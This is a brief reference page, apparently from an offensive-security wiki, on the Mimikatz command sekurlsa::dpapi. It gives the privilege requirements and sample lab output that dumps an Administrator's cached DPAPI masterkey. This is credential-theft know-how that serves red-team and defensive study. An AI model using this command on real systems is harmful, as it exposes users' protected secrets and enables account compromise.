dpapi

sekurlsa::dpapi lists DPAPI cached masterkeys (cf. dumping DPAPI secrets).

This command requires elevated privileges (by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).

mimikatz # sekurlsa::dpapi

Authentication Id : 0 ; 227854 (00000000:00037a0e)
Session           : RemoteInteractive from 2
User Name         : Administrator
Domain            : hacklab
Logon Server      : DC
Logon Time        : 10/17/2021 4:19:23 AM
SID               : S-1-5-21-2725560159-1428537199-2260736313-500
         [00000000]
         * GUID      :  {0686f7cf-76f3-413b-a51e-28d0d0531013}
         * Time      :  10/17/2021 4:21:59 AM
         * MasterKey :  6b5b148b9244efab617e417936227286c24d340cfb9900cc632dcf1d10fd258d16337df2e090251851dec676d9d525b1fc5bd99c9383084fd0e9f4d0c45a3b0e
         * sha1(key) :  c5049248822679fdb3e60ba37531ae3e805f7122
PreviouscredmanNextdpapisystem

Last updated